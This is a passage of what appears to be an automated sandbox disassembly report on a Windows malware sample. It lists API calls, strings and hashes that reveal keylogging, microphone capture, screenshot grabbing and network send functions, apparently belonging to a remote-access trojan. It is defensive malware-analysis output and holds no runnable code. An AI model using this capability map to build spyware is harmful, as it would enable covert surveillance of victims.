                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B852
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B877
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041B885
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          • Opcode ID: ed58f78054f3304a0e571c39d56cdde4fa23284483a9ae65eff7322f5774d552
                                                          • Instruction ID: 2a104a3335fe37b36386f9496d9e2b25d881a91c22a4f34d2042fa75e5cfbfce
                                                          • Opcode Fuzzy Hash: ed58f78054f3304a0e571c39d56cdde4fa23284483a9ae65eff7322f5774d552
                                                          • Instruction Fuzzy Hash: 47F0C2B12422047FE6102F25AC89FBF3A5CDB86BA9F10023EF801A2291DE258C0581B9
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000004C), ref: 0041870F
                                                          • GetSystemMetrics.USER32(0000004D), ref: 00418715
                                                          • GetSystemMetrics.USER32(0000004E), ref: 0041871B
                                                          • GetSystemMetrics.USER32(0000004F), ref: 00418721
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 0409876626ed8831e64dc81abc3b09ac1b97839c455807a5cfaaf12ce600e90b
                                                          • Instruction ID: 0d34e4fe417a410293abd419840fb627d3fd172a5f9f2d4f3f0ee0adad43daa0
                                                          • Opcode Fuzzy Hash: 0409876626ed8831e64dc81abc3b09ac1b97839c455807a5cfaaf12ce600e90b
                                                          • Instruction Fuzzy Hash: 26F0D672B043215BCB00AB754C4596EBB969FC03A4F25083FFA159B381EE78EC4687D9
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 0044217D
                                                          Strings
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: 520362507bef941fab5cffea9abde62870a3d8c74bbf2bfcbae46fc27f337450
                                                          • Instruction ID: 9e1bbc3390eeabea57be79b34f62796538476165ffe421cdb5ba0d05f4dc7be1
                                                          • Opcode Fuzzy Hash: 520362507bef941fab5cffea9abde62870a3d8c74bbf2bfcbae46fc27f337450
                                                          • Instruction Fuzzy Hash: 7251AF61A0A20297F7557B15CE8137B2B90EB50741F684D6BF085423E9EB7CCC819F4E
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID: <kG$<kG
                                                          • API String ID: 2931989736-383723866
                                                          • Opcode ID: 21e918851be83e46baa3e5e3c8b8b30cd909724b045746f3163941703dd33272
                                                          • Instruction ID: 841d78c923fca9e627808cf77cab3bf97fcfd39527adbe47470f5cf9fadca134
                                                          • Opcode Fuzzy Hash: 21e918851be83e46baa3e5e3c8b8b30cd909724b045746f3163941703dd33272
                                                          • Instruction Fuzzy Hash: 9F613471604B0A9ED710DF28D8806A6B7A5FF18304F440A3FEC5CCF656E3B8A955C7A9
                                                          APIs
                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                            • Part of subcall function 0041B8B5: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041B8CA
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                          • String ID: pQG$NG
                                                          • API String ID: 2334542088-921107917
                                                          • Opcode ID: baae2f31211816717d1891d12ba902b559df7df93e5a23e8c27409df4f7124f2
                                                          • Instruction ID: 713adcd63a50277e86c853b9c7bd1a900ae8bd87492a3ad9f31fb308660c5d8e
                                                          • Opcode Fuzzy Hash: baae2f31211816717d1891d12ba902b559df7df93e5a23e8c27409df4f7124f2
                                                          • Instruction Fuzzy Hash: BB5141321082405AC365F775D8A2AEF73E5AFD4308F50483FF84A671E2EE789949C69D
                                                          APIs
                                                          • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DD69
                                                          Strings
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID: $vD
                                                          • API String ID: 1807457897-3636070802
                                                          • Opcode ID: af2dbb740455362532db4c6e27cef1bba8ecc5757f530743f693fef6f10ca257
                                                          • Instruction ID: 6a53932102cf2f29093c464eb4c67803ff3648b28b3ba8b7d074bec3f8911faa
                                                          • Opcode Fuzzy Hash: af2dbb740455362532db4c6e27cef1bba8ecc5757f530743f693fef6f10ca257
                                                          • Instruction Fuzzy Hash: D0415DB0D047489BEF218E24CC84AF6BBF9DF55708F2404EEE58A87142D239AD45DF65
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417DFE
                                                            • Part of subcall function 00417988: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417E11,00000000,?,?,?,?,00000000), ref: 0041799C
                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00417E4B
                                                            • Part of subcall function 004179FB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417E67,00000000,?,?), ref: 00417A0D
                                                            • Part of subcall function 004179AB: GdipDisposeImage.GDIPLUS(?,00417EC2), ref: 004179B4
                                                          Strings
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/jpeg
                                                          • API String ID: 1291196975-3785015651
                                                          • Opcode ID: c0c6e86b316e55d66ebf2cdb0a10bdafe60ea560917bbaebe4dfd9cc843f5356
                                                          • Instruction ID: 8af81f403c9bc23e7458ee74b157d237c4b9220e470ad7f048828f44144df9d5
                                                          • Opcode Fuzzy Hash: c0c6e86b316e55d66ebf2cdb0a10bdafe60ea560917bbaebe4dfd9cc843f5356
                                                          • Instruction Fuzzy Hash: 23313C71518204AFC301EF65C884DAFB7E9EF8A704F000A6EF98597251DB79D9098BA6
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450D49,?,00000050,?,?,?,?,?), ref: 00450BC9
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: 6fd782f53c9633299fe98566c4ec68ed2bffd726811d49864d22e4fe4dac6dcd
                                                          • Instruction ID: d29bb87f3b47b124c8bd6c760bb86eb4cd4ec0f84f402c6b2e0ab732353f73f5
                                                          • Opcode Fuzzy Hash: 6fd782f53c9633299fe98566c4ec68ed2bffd726811d49864d22e4fe4dac6dcd
                                                          • Instruction Fuzzy Hash: 4021F72AA00105A6E7308FD48C82B977396AB50B1BF564467ED09D7303F73AFD09C358
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417EEA
                                                            • Part of subcall function 00417988: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417E11,00000000,?,?,?,?,00000000), ref: 0041799C
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417F0F
                                                            • Part of subcall function 004179FB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417E67,00000000,?,?), ref: 00417A0D
                                                            • Part of subcall function 004179AB: GdipDisposeImage.GDIPLUS(?,00417EC2), ref: 004179B4
                                                          Strings
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/png
                                                          • API String ID: 1291196975-2966254431
                                                          • Opcode ID: af5d1f129cd5bd430e2235d416c6cbdfecbf91bf363856a8bd94ba4e637429f2
                                                          • Instruction ID: ee77ca1c213fe0bce41e511bbcee913114c194eb695e7cc9890245c9a4d1a3c2
                                                          • Opcode Fuzzy Hash: af5d1f129cd5bd430e2235d416c6cbdfecbf91bf363856a8bd94ba4e637429f2
                                                          • Instruction Fuzzy Hash: B9219F71204210AFC301AB61CC88DBFBBBDEFCA714B00052EF94693261DB389945CBA6
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: P*G$T*G
                                                          • API String ID: 269201875-829108958
                                                          • Opcode ID: 2f751c0efca173fa551c184794475f0d61f37e7d68ea2317de90041697b8eca5
                                                          • Instruction ID: a7437cf58198a632dccd7940a762e636932f246661e7801d2bdfb2ecead32fa8
                                                          • Opcode Fuzzy Hash: 2f751c0efca173fa551c184794475f0d61f37e7d68ea2317de90041697b8eca5
                                                          • Instruction Fuzzy Hash: 6111E4711443429FFB20DF26D441B53B3E8EB55368B30842FE48A9B281DB78AC859788
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,00474EE0,004755B0,?,?,?,?,?,?,?,00414F0F,?,00000001,0000004C,00000000), ref: 004049F1
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • GetLocalTime.KERNEL32(?,00474EE0,004755B0,?,?,?,?,?,?,?,00414F0F,?,00000001,0000004C,00000000), ref: 00404A4E
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 481472006-1507639952
                                                          • Opcode ID: 7b17d1e227f48684207d6be12f6d8554e6a2daeb87b5d1524601f4e1b57e679e
                                                          • Instruction ID: 07f09c1926c096f578aeb4a964dedba27d52497869334d5e310e707c12b0f234
                                                          • Opcode Fuzzy Hash: 7b17d1e227f48684207d6be12f6d8554e6a2daeb87b5d1524601f4e1b57e679e
                                                          • Instruction Fuzzy Hash: 932131B1A042806BD600F77A980635B7B9497C4314F84043FE90C562E2EEBD59898BAF
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00448B53
                                                          • GetFileType.KERNEL32(00000000), ref: 00448B65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileHandleType
                                                          • String ID: 0Qd
                                                          • API String ID: 3000768030-844494294
                                                          • Opcode ID: 709764ea7de61a1ee6b1c7a208d8f310102b3ec00a3095b3a15ed26258e7c2c3
                                                          • Instruction ID: 4d96847604c3c5e89c92e0bae5a56447120e6fba85ff24299cab8e9791f5b951
                                                          • Opcode Fuzzy Hash: 709764ea7de61a1ee6b1c7a208d8f310102b3ec00a3095b3a15ed26258e7c2c3
                                                          • Instruction Fuzzy Hash: E71196B15047814EE7304A3D8C8962B6A54D752334B38071FF5B6967F1CF28E882924D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: 0Qd
                                                          • API String ID: 269201875-844494294
                                                          • Opcode ID: d7be576e25eb8f91f1c7522a8e83579c420102f8c2aee4373051d9f21f228018
                                                          • Instruction ID: bbcf2e6bbb9829bcdebbaa4262a7be325da62559df7761f078343b1b3ea7e5ad
                                                          • Opcode Fuzzy Hash: d7be576e25eb8f91f1c7522a8e83579c420102f8c2aee4373051d9f21f228018
                                                          • Instruction Fuzzy Hash: EF11B471A803114AE7245F39BD42F563254E704734F15122BEA79DB2E0E7BCC8C2568A
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 93a98d44db7fb0c881bd96abbdce9d50535dabea07bf117fefb48cdc9cbc8cb7
                                                          • Instruction ID: bea5c42f2d95e84a76b62dfc34e9438b8882b4e2d456746f57979f9b7964cbe7
                                                          • Opcode Fuzzy Hash: 93a98d44db7fb0c881bd96abbdce9d50535dabea07bf117fefb48cdc9cbc8cb7
                                                          • Instruction Fuzzy Hash: 0F114C725082405BC704EBA5D8969BF77E8AB94708F10093FF885A31E1EF38DA44C69E
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004126EA
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412720
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID: TeF
                                                          • API String ID: 3660427363-331424825
                                                          • Opcode ID: d95fd9167a1313fe8c80bfc7e96c72c6aa8b9b847f69a2249def5cc6c104aaba
                                                          • Instruction ID: 3cb62dd7824af05a29d95bf947337739d939994cfcf273d244ad568f401b79ba
                                                          • Opcode Fuzzy Hash: d95fd9167a1313fe8c80bfc7e96c72c6aa8b9b847f69a2249def5cc6c104aaba
                                                          • Instruction Fuzzy Hash: 650184B6A00108BFEB05AB95DD46EFF7ABDEB44240F14007AF901E2241E6B0AF049664
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041A0A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: TeF$alarm.wav
                                                          • API String ID: 1174141254-486219832
                                                          • Opcode ID: f7ee6337fc654cc0b09d6f8c04168479c952f1b1aa7db7e8f0e02e837cc1a088
                                                          • Instruction ID: 6b61ed94da76c6dc8509722386f9763649bd27766d5c45ddbf5277e073f3d638
                                                          • Opcode Fuzzy Hash: f7ee6337fc654cc0b09d6f8c04168479c952f1b1aa7db7e8f0e02e837cc1a088
                                                          • Instruction Fuzzy Hash: 4D01D23160520166C604B636D8576EE3A458BC0728F50813FF88A666E2EF7CAED5C2DF
                                                          APIs
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                          • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: 908f31768a51f4bba0f1177a467c2c11ec0582f6bfe0bae760a55f80d2203bb8
                                                          • Instruction ID: da65c2120251a34d34924486d515db36f90714a8cba0a7d82e96ebed52376b78
                                                          • Opcode Fuzzy Hash: 908f31768a51f4bba0f1177a467c2c11ec0582f6bfe0bae760a55f80d2203bb8
                                                          • Instruction Fuzzy Hash: 5901F131A043019BCB25BB35C80B7AEBBB19B45314F40406EE441225D2EB7999A6C3DF
                                                          APIs
                                                            • Part of subcall function 00444CDC: EnterCriticalSection.KERNEL32(-00472558,?,0044246B,00000000,0046EAD0,0000000C,00442426,0000000A,?,?,00448949,0000000A,?,00447184,00000001,00000364), ref: 00444CEB
                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046ECB8,00000010,0043AF25), ref: 004489D5
                                                          • _free.LIBCMT ref: 004489E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$DeleteEnter_free
                                                          • String ID: 0Qd
                                                          • API String ID: 1836352639-844494294
                                                          • Opcode ID: 9d76c620edcff08112ad37d792de4fd9c43109646451596060a8f89fb46b25c4
                                                          • Instruction ID: 148d79857643bc82b319f24316268943629f83d9e3709ab7633481e59fa6f6a8
                                                          • Opcode Fuzzy Hash: 9d76c620edcff08112ad37d792de4fd9c43109646451596060a8f89fb46b25c4
                                                          • Instruction Fuzzy Hash: F51161715002119FE715DFA9E946BAD73B0FB08724F11411EE5A5AB2E2CF7CE8829B0D
                                                          APIs
                                                          • waveInPrepareHeader.WINMM(0063F360,00000020,?,?,00000000,00476B98,00474EE0,?,00000000,00401913), ref: 00401747
                                                          • waveInAddBuffer.WINMM(0063F360,00000020,?,00000000,00401913), ref: 0040175D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferHeaderPrepare
                                                          • String ID: XMG
                                                          • API String ID: 2315374483-813777761
                                                          • Opcode ID: 620c8429846d9d472bb74b0b690090328b51b047c9fc1556c206adb706f1508e
                                                          • Instruction ID: 26799fbdff8c3ec01ad48014b311b0d3f370155dffc0330205344997a7b0d52a
                                                          • Opcode Fuzzy Hash: 620c8429846d9d472bb74b0b690090328b51b047c9fc1556c206adb706f1508e
                                                          • Instruction Fuzzy Hash: 6501AD71300300AFD7209F39ED45A69BBB5EF89315B00413EB808E33A2EB74AC50CB98
                                                          APIs
                                                          • IsValidLocale.KERNEL32(00000000,z?D,00000000,00000001,?,?,00443F7A,?,?,?,?,00000004), ref: 004479EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocaleValid
                                                          • String ID: IsValidLocaleName$z?D
                                                          • API String ID: 1901932003-2490211753
                                                          • Opcode ID: 030ca6b5b062e3e6eb463140e6e5805cf12db518d0019a9c378278714199a4d0
                                                          • Instruction ID: 892bc6e93789200f6c95030ba230210178196c8f1f686432b442ac7872abfc60
                                                          • Opcode Fuzzy Hash: 030ca6b5b062e3e6eb463140e6e5805cf12db518d0019a9c378278714199a4d0
                                                          • Instruction Fuzzy Hash: 06F0E930645218B7DB186F258C06F5E7B95CB05716F50807BFC047A293DE794E0295DD
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: XMG$XMG
                                                          • API String ID: 3519838083-886261599
                                                          • Opcode ID: 94d942c2b9cd7cd452367b65107360caec8e392a141153fe325b9bee2a1bda9b
                                                          • Instruction ID: 0a877421dfc5135a28098138b17ad9f721677e320a6d1c8a6a2adbe775497da7
                                                          • Opcode Fuzzy Hash: 94d942c2b9cd7cd452367b65107360caec8e392a141153fe325b9bee2a1bda9b
                                                          • Instruction Fuzzy Hash: D4F0E9B1B00211ABC715BB65880569EB768EF41369F01827FB416772E1CFBD5D04975C
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                            • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,00475108), ref: 00409B3F
                                                            • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                            • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                            • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                            • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,00475108), ref: 00409B67
                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047515C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: 013d8eb75564844e77d0a130007ea633e5b9443d2c6b05f924e9c22f592720ae
